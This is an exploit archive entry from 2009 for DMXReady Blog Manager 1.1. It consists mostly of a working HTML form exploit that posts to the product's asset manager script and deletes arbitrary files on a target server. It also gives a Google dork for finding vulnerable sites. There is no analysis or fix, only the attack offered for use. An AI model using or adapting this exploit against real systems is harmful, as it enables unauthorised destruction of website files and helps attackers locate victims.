DMXReady Blog Manager 1.1 - Remote File Delete

EDB-ID:

7764

CVE:

N/A


Author:

ajann

Type:

webapps


Platform:

PHP

Date:

2009-01-14


*******************************************************************************
# Title   :  DMXReady Blog Manager <= 1.1 Remote Files Delete Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  199.97 $
# Dork    :  inurl:inc_webblogmanager.asp
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_webblogmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>

<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
  <label>
  <input type="hidden" name="inpCurrFolder" value="" />
  </label>
  <p>
    <label>
    Delete File Path:
    <input type="text" name="inpFileToDelete" value="/shots/index.asp">
    </label> 
    etc..
</p>
  <p>
    <label>
    <input type="submit" name="ff" id="ff" value="Submit" />
    </label>
  </p>
</form>
<p><br />
</p>
</body>
</html>

# milw0rm.com [2009-01-14]